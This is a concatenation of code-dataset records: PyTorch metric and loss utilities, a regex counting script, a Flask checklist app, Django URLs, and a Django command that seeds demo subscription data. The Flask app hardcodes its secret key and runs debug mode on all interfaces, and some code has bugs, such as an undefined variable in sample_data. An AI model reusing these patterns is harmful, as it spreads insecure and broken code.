will be sampled from the data.\n\n Returns\n -------\n samples : list\n List of tensors containing the sampled data points.\n \"\"\"\n # initialize the tensors that will store the samples\n samples = []\n for n_f in n_features:\n samples.append(torch.zeros(n_samples, n_f))\n\n # determine the number of data points sampled per batch\n # -> we make sure that we sample at least 500 data points per batch to reduce runtime\n n_samples_per_batch = max(\n (n_samples + len(data_loader) - 1) // len(data_loader), 500\n )\n\n # iterate over the dataset\n already_sampled = 0\n for data, _ in data_loader:\n # stop if already enough data points have been sampled\n if already_sampled >= n_samples:\n break\n\n # iterate over all data types and sample independendly for all\n current_size = 0\n for i in range(len(n_features)):\n # make sure to sample at most the number of data points in the current batch\n max_samples_per_batch = min(data[i].size(0), n_samples_per_batch)\n\n # sample random indices of the data Tensor (number of sampled indices is either the\n # maximum number of data points or n_samples_per_batch, whatever is smaller)\n indices = torch.randperm(data[i].size(0))[:max_samples_per_batch]\n current_samples = data[i][indices]\n\n # only use a subset of the sampled data points in this batch, if this batch would\n # exceed the maximum number of samples\n current_size = current_samples.size(0)\n if already_sampled + current_size > n_samples:\n current_size = n_samples - already_sampled\n data_oliogmers = data_oliogmers[:current_size]\n\n # update the samples Tensor with the current batch of sampled data points\n samples[i][\n already_sampled : already_sampled + current_size\n ] = current_samples\n\n already_sampled += current_size\n\n # return the sampled data points\n print(f\"sample_data routine returned {already_sampled} sampled data points\")\n return [s[:already_sampled, :] for s in samples]\n\n\ndef category_from_output(output):\n r\"\"\"This auxiliary function returns the class with highest probability from\n a network's output.\n\n Parameters\n ----------\n output : Tensor\n Output of a PyTorch model.\n \n Returns\n -------\n category_i : int\n Index of the category with the highest probability.\n \"\"\"\n top_n, top_i = output.topk(1)\n category_i = top_i[0].item()\n return category_i\n\n\ndef recall_at_fdr(y_true, y_score, fdr_cutoff=0.05):\n r\"\"\"Compute recall at certain false discovery rate cutoffs\n \"\"\"\n # convert y_true and y_score into desired format\n # -> both have to be lists of shape [nb_samples]\n if len(y_true.shape) > 1:\n y_true_new = y_true.argmax(axis=1)\n else:\n y_true_new = y_true\n if len(y_score.shape) > 1:\n y_score_new = [y_score[j][i] for j, i in enumerate(y_true_new)]\n else:\n y_score_new = y_score\n precision, recall, _ = precision_recall_curve(y_true_new, y_score_new)\n fdr = 1 - precision\n cutoff_index = next(i for i, x in enumerate(fdr) if x <= fdr_cutoff)\n return recall[cutoff_index]\n\n\ndef compute_metrics_classification(y_true, y_pred):\n r\"\"\"Compute standard performance metrics for predictions of a trained model.\n \n Parameters\n ----------\n y_true : Tensor\n True value for each sample provided as a tensor of shape (n_sample).\n y_pred : Tensor\n Predicted value for each sample provided as a tensor of shape (n_samples).\n \n Returns\n -------\n df_metric : pandas.DataFrame\n Different performance metrics for the provided predictions as a Pandas DataFrame.\n \"\"\"\n y_true, y_pred = np.asarray(y_true), np.asarray(y_pred)\n\n metric = {}\n metric[\"log.loss\"] = log_loss(y_true, y_pred)\n metric[\"accuracy\"] = accuracy_score(y_true, y_pred > 0.5)\n\n # check for multiclass classification\n if len(y_true.shape) > 1 and len(y_pred.shape) > 1:\n metric[\"F_score\"] = f1_score(y_true.argmax(axis=1), y_pred.argmax(axis=1))\n metric[\"MCC\"] = matthews_corrcoef(y_true.argmax(axis=1), y_pred.argmax(axis=1))\n else:\n metric[\"F_score\"] = f1_score(y_true, y_pred > 0.5)\n metric[\"MCC\"] = matthews_corrcoef(y_true, y_pred > 0.5)\n\n metric[\"auROC\"] = roc_auc_score(y_true, y_pred)\n metric[\"auROC50\"] = roc_auc_score(y_true, y_pred, max_fpr=0.5)\n metric[\"auPRC\"] = average_precision_score(y_true, y_pred)\n metric[\"recall_at_10_fdr\"] = recall_at_fdr(y_true, y_pred, 0.10)\n metric[\"recall_at_5_fdr\"] = recall_at_fdr(y_true, y_pred, 0.05)\n metric[\"pearson.r\"], metric[\"pearson.p\"] = stats.pearsonr(\n y_true.ravel(), y_pred.ravel()\n )\n metric[\"spearman.r\"], metric[\"spearman.p\"] = stats.spearmanr(\n y_true, y_pred, axis=None\n )\n\n df_metric = pd.DataFrame.from_dict(metric, orient=\"index\")\n df_metric.columns = [\"value\"]\n df_metric.sort_index(inplace=True)\n\n return df_metric\n\n\ndef compute_metrics_regression(y_true, y_pred):\n r\"\"\"Compute standard regression performance metrics for predictions of a trained model.\n \n Parameters\n ----------\n y_true : Tensor\n True value for each sample provided as a tensor of shape (n_sample).\n y_pred : Tensor\n Predicted value for each sample provided as a tensor of shape (n_samples).\n \n Returns\n -------\n df_metric : pandas.DataFrame\n Different performance metrics for the provided predictions as a Pandas DataFrame.\n \"\"\"\n raise NotImplementedError(\"compute_metrics_regression is not implemented yet!\")\n\n\nclass ClassBalanceLoss(torch.nn.Module):\n r\"\"\"Implementation of the Class-Balance Loss\n\n Reference: Yin Cui, Menglin Jia, Tsung-Yi Lin, Yang Song, Serge Belongie; Proceedings of the \n IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR), 2019, pp. 9268-9277\n \"\"\"\n\n def __init__(\n self, samples_per_cls, no_of_classes, loss_type, beta, gamma, reduction=\"mean\"\n ):\n r\"\"\"Constructor of the class-balance loss class\n\n Parameters\n ----------\n samples_per_cls : list of int\n List containing the number of samples per class in the dataset.\n no_of_classes : int\n Number of classes in the classification problem.\n loss_type : str\n Loss function used for the class-balance loss.\n beta : float\n Hyperparameter for class-balanced loss.\n gamma : float\n Hyperparameter for Focal loss\n\n Raises\n ------\n ValueError: If len(samples_per_cls) != no_of_classes\n \"\"\"\n # call constructor of parent class\n super(ClassBalanceLoss, self).__init__()\n\n # check whether the parameters are valid\n if no_of_classes == 1:\n self.binary = True\n elif len(samples_per_cls) != no_of_classes:\n raise ValueError(\n \"Dimensionality of first argument expected to be {}. Found {} instead!\".format(\n no_of_classes, len(samples_per_cls)\n )\n )\n\n # store user-specified parameters\n self.samples_per_cls = samples_per_cls\n self.no_of_classes = no_of_classes\n self.loss_type = loss_type\n self.beta = beta\n self.gamma = gamma\n self.reduction = reduction\n\n effective_num = 1.0 - np.power(self.beta, self.samples_per_cls)\n weights = (1.0 - self.beta) / np.array(effective_num)\n weights = weights / np.sum(weights) * self.no_of_classes\n print(weights)\n\n def one_hot(self, labels, num_classes, device, dtype=None, eps=1e-6):\n r\"\"\"Convert an integer label x-D tensor to a one-hot (x+1)-D tensor. Implementation by Kornia\n (https://github.com/kornia).\n\n Parameters\n ----------\n labels : torch.Tensor\n Tensor with labels of shape :math:`(N, *)`, where N is batch size. Each value \n is an integer representing correct classification.\n num_classes : int\n Number of classes in labels.\n device : str \n The desired device of returned tensor.\n dtype : torch.dtype\n The desired data type of returned tensor.\n \n Returns\n -------\n one_hot : torch.Tensor\n The labels in one hot tensor of shape :math:`(N, C, *)`,\n \n Examples\n --------\n >>> labels = torch.LongTensor([[[0, 1], [2, 0]]])\n >>> one_hot(labels, num_classes=3)\n tensor([[[[1.0000e+00, 1.0000e-06],\n [1.0000e-06, 1.0000e+00]],\n \n [[1.0000e-06, 1.0000e+00],\n [1.0000e-06, 1.0000e-06]],\n \n [[1.0000e-06, 1.0000e-06],\n [1.0000e+00, 1.0000e-06]]]])\n \"\"\"\n if not isinstance(labels, torch.Tensor):\n raise TypeError(\n f\"Input labels type is not a torch.Tensor. Got {type(labels)}\"\n )\n\n if not labels.dtype == torch.int64:\n raise ValueError(\n f\"labels must be of the same dtype torch.int64. Got: {labels.dtype}\"\n )\n\n if num_classes < 1:\n raise ValueError(\n \"The number of classes must be bigger than one.\"\n \" Got: {}\".format(num_classes)\n )\n\n shape = labels.shape\n one_hot = torch.zeros(\n (shape[0], num_classes) + shape[1:], device=device, dtype=dtype\n )\n\n return one_hot.scatter_(1, labels.unsqueeze(1), 1.0) + eps\n\n def focal_loss(self, input, target, alpha, gamma=2.0, reduction=\"none\", eps=None):\n r\"\"\"Criterion that computes Focal loss. \n \n Implementation by Kornia (https://github.com/kornia).\n\n Reference: Lin, Tsung-Yi, et al. \"Focal loss for dense object detection.\" \n Proceedings of the IEEE international conference on computer vision. 2017.\n \n According to Lin et al., the Focal loss is computed as \n :math:`\\text{FL}(p_t) = -\\alpha_t (1 - p_t)^{\\gamma} \\, \\log (p_t)`\n where :math:`p_t` is the model's estimated probability for each class.\n \n Parameters\n ----------\n input: torch.Tensor\n Logits tensor with shape :math:`(N, C, *)` where C = number of classes.\n target: torch.Tensor\n Labels tensor with shape :math:`(N, *)` where each value is :math:`0 ≤ targets[i] ≤ C−1`.\n alpha: float\n Weighting factor :math:`\\alpha \\in [0, 1]`.\n gamma: float\n Focusing parameter :math:`\\gamma >= 0`.\n reduction: str\n Specifies the reduction to apply to the output: ``'none'`` | ``'mean'`` | \n ``'sum'``. ``'none'``: no reduction will be applied, ``'mean'``: the sum of \n the output will be divided by the number of elements in the output, ``'sum'``: \n the output will be summed.\n eps: float\n (Deprecated) Scalar to enforce numerical stabiliy. This is no longer used.\n \n Returns\n -------\n loss : torch.Tensor\n The computed loss.\n \n Examples\n --------\n >>> N = 5 # num_classes\n >>> input = torch.randn(1, N, 3, 5, requires_grad=True)\n >>> target = torch.empty(1, 3, 5, dtype=torch.long).random_(N)\n >>> output = focal_loss(input, target, alpha=0.5, gamma=2.0, reduction='mean')\n >>> output.backward()\n \"\"\"\n if eps is not None and not torch.jit.is_scripting():\n warnings.warn(\n \"`focal_loss` has been reworked for improved numerical stability \"\n \"and the `eps` argument is no longer necessary\",\n DeprecationWarning,\n stacklevel=2,\n )\n\n if not isinstance(input, torch.Tensor):\n raise TypeError(f\"Input type is not a torch.Tensor. Got {type(input)}\")\n\n if not len(input.shape) >= 2:\n raise ValueError(\n f\"Invalid input shape, we expect BxCx*. Got: {input.shape}\"\n )\n\n if input.size(0) != target.size(0):\n raise ValueError(\n f\"Expected input batch_size ({input.size(0)}) to match target batch_size ({target.size(0)}).\"\n )\n\n n = input.size(0)\n out_size = (n,) + input.size()[2:]\n if target.size()[1:] != input.size()[2:]:\n raise ValueError(f\"Expected target size {out_size}, got {target.size()}\")\n\n if not input.device == target.device:\n raise ValueError(\n f\"input and target must be in the same device. Got: {input.device} and {target.device}\"\n )\n\n # compute softmax over the classes axis\n input_soft: torch.Tensor = F.softmax(input, dim=1)\n log_input_soft: torch.Tensor = F.log_softmax(input, dim=1)\n\n # create the labels one hot tensor\n target_one_hot: torch.Tensor = self.one_hot(\n target, num_classes=input.shape[1], device=input.device, dtype=input.dtype\n )\n\n # compute the actual focal loss\n weight = torch.pow(-input_soft + 1.0, gamma)\n\n focal = -alpha * weight * log_input_soft\n loss_tmp = torch.einsum(\"bc...,bc...->b...\", (target_one_hot, focal))\n\n if reduction == \"none\":\n loss = loss_tmp\n elif reduction == \"mean\":\n loss = torch.mean(loss_tmp)\n elif reduction == \"sum\":\n loss = torch.sum(loss_tmp)\n else:\n raise NotImplementedError(f\"Invalid reduction mode: {reduction}\")\n return loss\n\n def forward(self, logits, labels):\n r\"\"\"Compute the Class Balanced Loss between `logits` and the ground truth `labels`.\n Class Balanced Loss: ((1-beta)/(1-beta^n))*Loss(labels, logits) where Loss is one of the standard losses used\n for Neural Networks.\n \n Parameters\n ----------\n logits : torch.Tensor\n Output of the network given as a tensor of shape (batch_size x num_classes).\n labels : torch.Tensor\n True label of each sample given as a tensor of shape (batch_size x num_classes).\n \n Returns\n -------\n cb_loss : torch.Tensor\n A float tensor representing class balanced loss.\n \n Raises\n ------\n ValueError: If an unknown loss function was specified during initialization of the ClassBalanceLoss object.\n \"\"\"\n if self.binary:\n effective_num = 1.0 - np.power(self.beta, self.samples_per_cls)\n weights = (1.0 - self.beta) / np.array(effective_num)\n weights = weights / np.sum(weights)\n\n weights_tensor = torch.tensor(weights[1])\n labels_one_hot = labels\n else:\n effective_num = 1.0 - np.power(self.beta, self.samples_per_cls)\n weights = (1.0 - self.beta) / np.array(effective_num)\n weights = weights / np.sum(weights) * self.no_of_classes\n\n labels_one_hot = F.one_hot(labels, self.no_of_classes).float()\n\n # we need to adapt the dimensionality of logits if the batch size is 1\n # -> otherwise logits and labels_one_hot have mismatching dimensionality\n if labels_one_hot.shape[0] == 1:\n logits = logits.view_as(labels_one_hot)\n\n weights_tensor = labels_one_hot.new_tensor(weights)\n weights_tensor = weights_tensor.unsqueeze(0)\n weights_tensor = (\n weights_tensor.repeat(labels_one_hot.shape[0], 1) * labels_one_hot\n )\n weights_tensor = weights_tensor.sum(1)\n weights_tensor = weights_tensor.unsqueeze(1)\n weights_tensor = weights_tensor.repeat(1, self.no_of_classes)\n\n if self.loss_type == \"focal\":\n cb_loss = self.focal_loss(labels_one_hot, logits, weights_tensor)\n elif self.loss_type == \"sigmoid\":\n cb_loss = F.binary_cross_entropy_with_logits(\n input=logits,\n target=labels_one_hot,\n pos_weight=weights_tensor,\n reduction=self.reduction,\n )\n elif self.loss_type == \"softmax\":\n pred = logits.softmax(dim=1)\n cb_loss = F.binary_cross_entropy(\n input=pred,\n target=labels_one_hot,\n weight=weights_tensor,\n reduction=self.reduction,\n )\n elif self.loss_type == \"cross_entropy\":\n cb_loss = F.cross_entropy(\n input=logits,\n target=labels,\n weight=torch.tensor(weights).float(),\n reduction=self.reduction,\n )\n else:\n raise ValueError(\n \"Undefined loss function: {}.\".format(self.loss_type)\n + \"\\n Valid values are 'focal', 'sigmoid', 'softmax', and 'cross_entropy'.\"\n )\n\n return cb_loss\n","repo_name":"jditz/comics","sub_path":"comic/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":31965,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"19457807241","text":"import sys\r\nimport re\r\n\r\n\r\ndef search(string, pattern):\r\n string = ''.join(string.split(','))\r\n pattern = ''.join(pattern.split(','))\r\n searched = re.findall('(?=(' + pattern + '))', string)\r\n return len(searched)\r\n\r\n\r\ndef main():\r\n if len(sys.argv)!=3:\r\n print('Your input is invalid!')\r\n sys.exit()\r\n else:\r\n print('Pattern appears %s time!' % search(*sys.argv[1:]))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"mcdulltii/coding","sub_path":"SIT/Python/PatternSearching.py","file_name":"PatternSearching.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73617365314","text":"import logging\nfrom flask import render_template, Flask, send_from_directory, jsonify,\\\n url_for, redirect, request\nfrom flask_login import login_required, current_user\nfrom flask_classy import FlaskView, route\nfrom models.check import Check\nfrom models.category import Category\nfrom auth import register_auth\n\napp = Flask(__name__)\n\n\nlogging.basicConfig(\n level=logging.INFO,\n filename='/tmp/checkme.log',\n format='%(asctime)s %(name)s %(levelname)s %(message)s'\n)\n\n\nclass MainView(FlaskView):\n\n @login_required\n def index(self):\n return render_template('index.html', current_user=current_user)\n\n @route('/static/')\n @login_required\n def serve_static(self, filename):\n return send_from_directory(\n 'static',\n filename\n )\n\n\nclass CheckView(FlaskView):\n\n @login_required\n def get(self, categoryId):\n checks = Check.select().where(\n (Check.status == 'P') & (Check.category == int(categoryId))\n )\n return jsonify({'data': [x.to_json() for x in checks]})\n\n @login_required\n def check(self, checkId, check):\n c = Check.get(id=int(checkId))\n c.check = True if check == '1' else False\n c.save()\n return jsonify({'status': 'OK'})\n\n @login_required\n def cross(self, checkId, cross):\n c = Check.get(id=int(checkId))\n c.cross = True if cross == '1' else False\n c.save()\n return jsonify({'status': 'OK'})\n\n @login_required\n def post(self):\n\n Check(\n text=request.json['text'],\n category=Category.get(id=request.json['categoryId'])\n ).save()\n return jsonify({'status': 'OK'})\n\n @login_required\n def archive(self, categoryId):\n Check.archive(int(categoryId))\n return redirect(url_for('CheckView:get', categoryId=categoryId))\n\n @login_required\n def priority(self, checkId, priority):\n check = Check.get(id=int(checkId))\n check.priority = int(priority)\n check.save()\n return jsonify({'status': 'OK'})\n\n\nclass CategoryView(FlaskView):\n\n @login_required\n def all(self):\n categories = Category.select().where(Category.user == current_user.id)\n return jsonify({'data': [x.to_json() for x in categories]})\n\n @login_required\n def new(self, text):\n Category(text=text, user=current_user.id).save()\n return jsonify({'status': 'OK'})\n\n\nMainView.register(app)\nCheckView.register(app)\nCategoryView.register(app)\n\nregister_auth(app)\n\napp.config[\"SECRET_KEY\"] = 'Super Check Admin Key'\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000, debug=True)\n","repo_name":"eregnier/checkme","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22911786073","text":"from django.conf.urls import url, include\n\nfrom .views import PageViewSet\n\npage_list = PageViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\n\npage_detail = PageViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\n\nurlpatterns = [\n url(r'^pages/$', page_list, name=\"page-list\"),\n #url(r'^pages/root/$', page_detail, name=\"page-list\"),\n url(r'^pages/(?P\\w+)/$', page_detail, name='page-detail'),\n]\n","repo_name":"zyrobin/book_exercise-ExtJsApplicationDevelopment-Blueprints","sub_path":"djangoproject/ext6project/architecturecms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28909286266","text":"from django.urls import path\nfrom . import views\n\n\napp_name = \"images\"\nurlpatterns = [\n path(\n '', \n view=views.Images.as_view(), \n name=\"feed\"\n ),\n path(\n '/',\n view = views.ImageDetail.as_view(),\n name = \"image_detail\"\n ),\n path(\n '/likes/',\n view=views.LikeImage.as_view(),\n name='like_image'\n ),\n path(\n '/unlikes/',\n view=views.UnLikeImage.as_view(),\n name='unlike_image'\n ), \n path(\n '/comments/',\n view=views.CreateCommentOnImage.as_view(),\n name='create_comment'\n ),\n path(\n '/comments//',\n view=views.ModerateCommentOnImage.as_view(),\n name='moderate_comment'\n ), \n path(\n 'comments/',\n view=views.DeleteCommentOnImage.as_view(),\n name='delete_comment'\n ),\n path(\n 'search/',\n view=views.Search.as_view(),\n name='search'\n ), \n]\n\n","repo_name":"soulmecca/savitreact","sub_path":"savitreact/images/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14767692648","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom django import utils\r\nfrom django.core.management.base import BaseCommand\r\nfrom juntagrico import models as jm\r\nfrom juntagrico.entity import subtypes as st\r\nfrom juntagrico.entity.billing import ExtraSubBillingPeriod\r\nfrom juntagrico.entity.depot import Depot\r\nfrom juntagrico.entity.extrasubs import ExtraSubscriptionCategory, ExtraSubscriptionType\r\nfrom juntagrico.entity.jobs import ActivityArea, JobType\r\nfrom juntagrico.util import management as ja_mgmt\r\n\r\nfrom juntagrico_custom_sub import models as csm\r\n\r\n\r\nclass Command(BaseCommand):\r\n\r\n # entry point used by manage.py\r\n def handle(self, *args, **options):\r\n mem1_fields = {\r\n \"first_name\": \"Boro\",\r\n \"last_name\": \"Sadler\",\r\n \"email\": \"boro@juntagrico.ch\",\r\n \"addr_street\": \"Mühlezelgstrasse 1\",\r\n \"addr_zipcode\": \"8047\",\r\n \"addr_location\": \"Zürich\",\r\n \"birthday\": \"2017-03-27\",\r\n \"phone\": \"079 123 45 99\",\r\n \"mobile_phone\": \"\",\r\n \"confirmed\": True,\r\n \"reachable_by_email\": False,\r\n \"inactive\": False,\r\n }\r\n mem2_fields = {\r\n \"first_name\": \"Deepak\",\r\n \"last_name\": \"Olvirsson\",\r\n \"email\": \"deepak@juntagico.ch\",\r\n \"addr_street\": \"Otto-Lang-Weg 1\",\r\n \"addr_zipcode\": \"8044\",\r\n \"addr_location\": \"Zürich\",\r\n \"birthday\": \"2017-03-27\",\r\n \"phone\": \"079 123 45 99\",\r\n \"mobile_phone\": \"\",\r\n \"confirmed\": True,\r\n \"reachable_by_email\": False,\r\n \"inactive\": False,\r\n }\r\n member_1 = jm.Member.objects.create(**mem1_fields)\r\n member_2 = jm.Member.objects.create(**mem2_fields)\r\n share_all_fields = {\r\n \"member\": member_1,\r\n \"paid_date\": \"2017-03-27\",\r\n \"issue_date\": \"2017-03-27\",\r\n \"booking_date\": None,\r\n \"cancelled_date\": None,\r\n \"termination_date\": None,\r\n \"payback_date\": None,\r\n \"number\": None,\r\n \"notes\": \"\",\r\n }\r\n jm.Share.objects.create(**share_all_fields)\r\n jm.Share.objects.create(**share_all_fields)\r\n share_all_fields[\"member\"] = member_2\r\n jm.Share.objects.create(**share_all_fields)\r\n jm.Share.objects.create(**share_all_fields)\r\n subprod_fields = {\"name\": \"Milch\"}\r\n subproduct = st.SubscriptionProduct.objects.create(**subprod_fields)\r\n subsize1_fields = {\r\n \"name\": \"4 Liter\",\r\n \"long_name\": \"4 Liter Abo\",\r\n \"units\": 4,\r\n \"visible\": True,\r\n \"depot_list\": True,\r\n \"product\": subproduct,\r\n \"description\": \"4 Liter Abo enthält Produkte die 4 Liter Milch entsprechen.\",\r\n }\r\n subsize3_fields = {\r\n \"name\": \"8 Liter\",\r\n \"long_name\": \"8 Liter Abo\",\r\n \"units\": 8,\r\n \"visible\": True,\r\n \"depot_list\": True,\r\n \"product\": subproduct,\r\n \"description\": \"8 Liter Abo enthält Produkte die 8 Liter Milch entsprechen.\",\r\n }\r\n subsize4_fields = {\r\n \"name\": \"2 Liter\",\r\n \"long_name\": \"2 Liter Abo\",\r\n \"units\": 2,\r\n \"visible\": True,\r\n \"depot_list\": True,\r\n \"product\": subproduct,\r\n \"description\": \"2 Liter Abo enthält Produkte die 2 Liter Milch entsprechen.\",\r\n }\r\n subsize1 = st.SubscriptionSize.objects.create(**subsize1_fields)\r\n subsize3 = st.SubscriptionSize.objects.create(**subsize3_fields)\r\n subsize4 = st.SubscriptionSize.objects.create(**subsize4_fields)\r\n subtrype1_fields = {\r\n \"name\": \"4 Liter\",\r\n \"long_name\": \"4 Liter Abo\",\r\n \"size\": subsize1,\r\n \"shares\": 1,\r\n \"visible\": True,\r\n \"required_assignments\": 2,\r\n \"price\": 650,\r\n \"description\": \"4 Liter Abo.\",\r\n }\r\n subtrype3_fields = {\r\n \"name\": \"8 Liter\",\r\n \"long_name\": \"8 Liter\",\r\n \"size\": subsize3,\r\n \"shares\": 2,\r\n \"visible\": True,\r\n \"required_assignments\": 4,\r\n \"price\": 1200,\r\n \"description\": \"8 Liter Abo.\",\r\n }\r\n subtrype4_fields = {\r\n \"name\": \"2 Liter\",\r\n \"long_name\": \"2 Liter\",\r\n \"size\": subsize4,\r\n \"shares\": 0,\r\n \"visible\": True,\r\n \"required_assignments\": 1,\r\n \"price\": 300,\r\n \"description\": \"2 Liter Abo.\",\r\n }\r\n subtype1 = st.SubscriptionType.objects.create(**subtrype1_fields)\r\n subtype3 = st.SubscriptionType.objects.create(**subtrype3_fields)\r\n st.SubscriptionType.objects.create(**subtrype4_fields)\r\n depot1_fields = {\r\n \"code\": \"D1\",\r\n \"name\": \"Toblerplatz\",\r\n \"weekday\": 2,\r\n \"latitude\": \"47.379308\",\r\n \"longitude\": \"8.559405\",\r\n \"addr_street\": \"Toblerstrasse 73\",\r\n \"addr_zipcode\": \"8044\",\r\n \"addr_location\": \"Zürich\",\r\n \"description\": \"Hinter dem Migros\",\r\n \"contact\": member_2,\r\n }\r\n depot2_fields = {\r\n \"code\": \"D2\",\r\n \"name\": \"Siemens\",\r\n \"weekday\": 4,\r\n \"latitude\": \"47.379173\",\r\n \"longitude\": \"8.495392\",\r\n \"addr_street\": \"Albisriederstrasse 207\",\r\n \"addr_zipcode\": \"8047\",\r\n \"addr_location\": \"Zürich\",\r\n \"description\": \"Hinter dem Restaurant Cube\",\r\n \"contact\": member_1,\r\n }\r\n depot1 = Depot.objects.create(**depot1_fields)\r\n depot2 = Depot.objects.create(**depot2_fields)\r\n\r\n subscription_1 = ja_mgmt.create_subscription(\"2018-01-01\", depot1, {subtype1: 1}, member_1)\r\n subscription_2 = ja_mgmt.create_subscription(\"2018-01-01\", depot2, {subtype3: 1}, member_2)\r\n\r\n area1_fields = {\r\n \"name\": \"Abpacken\",\r\n \"description\": \"Produkte abpacken\",\r\n \"core\": False,\r\n \"hidden\": False,\r\n \"coordinator\": member_1,\r\n \"show_coordinator_phonenumber\": False,\r\n }\r\n area2_fields = {\r\n \"name\": \"Ausfahren\",\r\n \"description\": \"Produkte ausfahren\",\r\n \"core\": False,\r\n \"hidden\": False,\r\n \"coordinator\": member_2,\r\n \"show_coordinator_phonenumber\": False,\r\n }\r\n area_1 = ActivityArea.objects.create(**area1_fields)\r\n area_1.members.set([member_2])\r\n area_1.save()\r\n area_2 = ActivityArea.objects.create(**area2_fields)\r\n area_2.members.set([member_1])\r\n area_2.save()\r\n type1_fields = {\r\n \"name\": \"Abpacken\",\r\n \"displayed_name\": \"\",\r\n \"description\": \"the real deal\",\r\n \"activityarea\": area_1,\r\n \"duration\": 2,\r\n \"location\": \"auf dem Hof\",\r\n }\r\n type2_fields = {\r\n \"name\": \"Ausfahren\",\r\n \"displayed_name\": \"\",\r\n \"description\": \"the real deal\",\r\n \"activityarea\": area_2,\r\n \"duration\": 2,\r\n \"location\": \"auf dem Hof\",\r\n }\r\n type_1 = JobType.objects.create(**type1_fields)\r\n type_2 = JobType.objects.create(**type2_fields)\r\n job1_all_fields = {\r\n \"slots\": 10,\r\n \"time\": utils.timezone.now(),\r\n \"pinned\": False,\r\n \"reminder_sent\": False,\r\n \"canceled\": False,\r\n \"type\": type_1,\r\n }\r\n for x in range(0, 10):\r\n delta = utils.timezone.timedelta(days=7)\r\n job1_all_fields[\"time\"] += delta\r\n jm.RecuringJob.objects.create(**job1_all_fields) # warning\r\n\r\n job2_all_fields = {\r\n \"slots\": 10,\r\n \"time\": utils.timezone.now(),\r\n \"pinned\": False,\r\n \"reminder_sent\": False,\r\n \"canceled\": False,\r\n \"type\": type_2,\r\n }\r\n for x in range(0, 10):\r\n delta = utils.timezone.timedelta(days=7)\r\n job1_all_fields[\"time\"] += delta\r\n jm.RecuringJob.objects.create(**job2_all_fields) # warning\r\n\r\n # CS specific\r\n prod1_fields = {\r\n \"name\": \"Rohmilch\",\r\n \"units\": 1,\r\n \"unit_multiplier\": 1,\r\n \"unit_name\": \"Liter\",\r\n \"code\": \"A1\",\r\n }\r\n prod2_fields = {\r\n \"name\": \"Zusatzkäse\",\r\n \"units\": 2,\r\n \"unit_multiplier\": 100,\r\n \"unit_name\": \"Gramm\",\r\n \"code\": \"A2\"\r\n }\r\n prod3_fields = {\r\n \"name\": \"Quark\",\r\n \"units\": 1,\r\n \"unit_multiplier\": 350,\r\n \"unit_name\": \"Gramm\",\r\n \"code\": \"A3\"\r\n }\r\n prod4_fields = {\r\n \"name\": \"Fruchtjoghurt\",\r\n \"units\": 0.5,\r\n \"unit_multiplier\": 1000,\r\n \"unit_name\": \"Gramm\",\r\n \"code\": \"A4\"\r\n }\r\n prod5_fields = {\r\n \"name\": \"Naturejoghurt\",\r\n \"units\": 0.5,\r\n \"unit_multiplier\": 1000,\r\n \"unit_name\": \"Gramm\",\r\n \"code\": \"A5\"\r\n }\r\n prod6_fields = {\r\n \"name\": \"Wochenkäse klein\",\r\n \"units\": 2,\r\n \"unit_multiplier\": 100,\r\n \"unit_name\": \"Gramm\",\r\n \"user_editable\": False,\r\n \"code\": \"A6\"\r\n }\r\n prod7_fields = {\r\n \"name\": \"Wochenkäse gross\",\r\n \"units\": 4,\r\n \"unit_multiplier\": 100,\r\n \"unit_name\": \"Gramm\",\r\n \"user_editable\": False,\r\n \"code\": \"A7\"\r\n }\r\n csm.Product.objects.create(**prod1_fields)\r\n csm.Product.objects.create(**prod2_fields)\r\n csm.Product.objects.create(**prod3_fields)\r\n csm.Product.objects.create(**prod4_fields)\r\n csm.Product.objects.create(**prod5_fields)\r\n wochenkase_klein = csm.Product.objects.create(**prod6_fields)\r\n wochenkase_gross = csm.Product.objects.create(**prod7_fields)\r\n\r\n mandatory1_fields = {\r\n \"subscription_size\": subsize1,\r\n \"product\": wochenkase_klein,\r\n \"amount\": 1,\r\n }\r\n mandatory3_fields = {\r\n \"subscription_size\": subsize3,\r\n \"product\": wochenkase_gross,\r\n \"amount\": 1,\r\n }\r\n csm.SubscriptionSizeMandatoryProducts.objects.create(**mandatory1_fields)\r\n csm.SubscriptionSizeMandatoryProducts.objects.create(**mandatory3_fields)\r\n\r\n subcontent1_fields = {\"subscription\": subscription_1}\r\n subcontent2_fields = {\"subscription\": subscription_2}\r\n subcontent1 = csm.SubscriptionContent.objects.create(**subcontent1_fields)\r\n subcontent2 = csm.SubscriptionContent.objects.create(**subcontent2_fields)\r\n\r\n subcontentitem1_fields = {\r\n \"subscription_content\": subcontent1,\r\n \"product\": wochenkase_klein,\r\n \"amount\": 1,\r\n }\r\n subcontentitem2_fields = {\r\n \"subscription_content\": subcontent2,\r\n \"product\": wochenkase_gross,\r\n \"amount\": 1,\r\n }\r\n csm.SubscriptionContentItem.objects.create(**subcontentitem1_fields)\r\n csm.SubscriptionContentItem.objects.create(**subcontentitem2_fields)\r\n\r\n csm.SubscriptionContentFutureItem.objects.create(**subcontentitem1_fields)\r\n csm.SubscriptionContentFutureItem.objects.create(**subcontentitem2_fields)\r\n\r\n # add extra subscriptions (Zusatzabos)\r\n extra_sub_cat1 = ExtraSubscriptionCategory.objects.create(\r\n name=\"Spezialkäse\",\r\n description=\"Spezialkäse für Waghalsige Käseliebhaber\",\r\n sort_order=1,\r\n visible=True,\r\n )\r\n extra_sub_type1 = 